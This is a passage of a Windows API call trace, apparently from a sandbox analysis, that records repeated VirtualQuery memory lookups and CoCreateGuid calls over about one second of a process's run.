	[0295.463] VirtualQuery (in: lpAddress=0x1ab7a0, lpBuffer=0x1ac660, dwLength=0x30 | out: lpBuffer=0x1ac660*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.464] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xe81b5461, Data2=0x88db, Data3=0x4591, Data4=([0]=0x9a, [1]=0x2, [2]=0x62, [3]=0x45, [4]=0x88, [5]=0x61, [6]=0x7d, [7]=0xb2))) returned 0x0
	[0295.464] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x8a616db6, Data2=0xd815, Data3=0x43b9, Data4=([0]=0xa7, [1]=0xff, [2]=0xfb, [3]=0xe0, [4]=0x75, [5]=0xdc, [6]=0xf8, [7]=0x17))) returned 0x0
	[0295.464] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.464] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.464] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.465] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.466] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.466] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.466] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.466] VirtualQuery (in: lpAddress=0x1abc70, lpBuffer=0x1acb30, dwLength=0x30 | out: lpBuffer=0x1acb30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.466] VirtualQuery (in: lpAddress=0x1abc70, lpBuffer=0x1acb30, dwLength=0x30 | out: lpBuffer=0x1acb30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.467] VirtualQuery (in: lpAddress=0x1abc70, lpBuffer=0x1acb30, dwLength=0x30 | out: lpBuffer=0x1acb30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.189] VirtualQuery (in: lpAddress=0x1abc70, lpBuffer=0x1acb30, dwLength=0x30 | out: lpBuffer=0x1acb30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1ab360, lpBuffer=0x1ac220, dwLength=0x30 | out: lpBuffer=0x1ac220*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1ab3f0, lpBuffer=0x1ac2b0, dwLength=0x30 | out: lpBuffer=0x1ac2b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.190] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1ab7a0, lpBuffer=0x1ac660, dwLength=0x30 | out: lpBuffer=0x1ac660*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.191] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.192] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.192] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.192] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.192] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x8f52de8, Data2=0x897c, Data3=0x4bf2, Data4=([0]=0x89, [1]=0xc5, [2]=0x27, [3]=0xce, [4]=0xff, [5]=0xa9, [6]=0x1d, [7]=0xe8))) returned 0x0
	[0296.192] VirtualQuery (in: lpAddress=0x1ab360, lpBuffer=0x1ac220, dwLength=0x30 | out: lpBuffer=0x1ac220*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.192] VirtualQuery (in: lpAddress=0x1ab3f0, lpBuffer=0x1ac2b0, dwLength=0x30 | out: lpBuffer=0x1ac2b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.193] VirtualQuery (in: lpAddress=0x1ab610, lpBuffer=0x1ac4d0, dwLength=0x30 | out: lpBuffer=0x1ac4d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.193] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x8922e718, Data2=0x30b7, Data3=0x4147, Data4=([0]=0x83, [1]=0x26, [2]=0x86, [3]=0x44, [4]=0xa9, [5]=0xed, [6]=0xcc, [7]=0x72))) returned 0x0
	[0296.193] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4aa5c28, Data2=0x82b0, Data3=0x44a5, Data4=([0]=0x8b, [1]=0x5e, [2]=0x74, [3]=0xc0, [4]=0xdc, [5]=0x73, [6]=0x63, [7]=0xa3))) returned 0x0
	[0296.193] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4f602271, Data2=0x77fb, Data3=0x431e, Data4=([0]=0xb7, [1]=0x33, [2]=0xda, [3]=0x4e, [4]=0x6e, [5]=0xbe, [6]=0xc5, [7]=0xea))) returned 0x0
	[0296.194] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x7a0b9c6e, Data2=0x6ee5, Data3=0x4aab, Data4=([0]=0xbb, [1]=0x87, [2]=0x3d, [3]=0x30, [4]=0x48, [5]=0xe2, [6]=0x23, [7]=0x4b))) returned 0x0
	[0296.194] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb4deb00c, Data2=0x4fc3, Data3=0x4f69, Data4=([0]=0x97, [1]=0xa3, [2]=0x43, [3]=0x2d, [4]=0x7b, [5]=0x13, [6]=0x53, [7]=0x22))) returned 0x0
	[0296.194] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x7b9e3e00, Data2=0x51c8, Data3=0x4908, Data4=([0]=0x86, [1]=0xed, [2]=0x7d, [3]=0x8d, [4]=0x5b, [5]=0xb6, [6]=0xbf, [7]=0x9d))) returned 0x0
	[0296.194] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xfb6ec184, Data2=0x4bf5, Data3=0x4b15, Data4=([0]=0xb3, [1]=0x30, [2]=0x9b, [3]=0x28, [4]=0xec, [5]=0xad, [6]=0x38, [7]=0x8b))) returned 0x0
	[0296.194] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x3a1a9291, Data2=0x8eac, Data3=0x48da, Data4=([0]=0xb1, [1]=0xa4, [2]=0x17, [3]=0xe3, [4]=0x27, [5]=0x9a, [6]=0x78, [7]=0x59))) returned 0x0
	[0296.194] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.194] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.195] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1ab1d0, lpBuffer=0x1ac090, dwLength=0x30 | out: lpBuffer=0x1ac090*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1ab260, lpBuffer=0x1ac120, dwLength=0x30 | out: lpBuffer=0x1ac120*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.196] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf8b7a5e5, Data2=0xcc96, Data3=0x4625, Data4=([0]=0xb6, [1]=0xce, [2]=0x1f, [3]=0x6b, [4]=0x2f, [5]=0x83, [6]=0x53, [7]=0x46))) returned 0x0
	[0296.197] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.197] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.198] VirtualQuery (in: lpAddress=0x1abae0, lpBuffer=0x1ac9a0, dwLength=0x30 | out: lpBuffer=0x1ac9a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
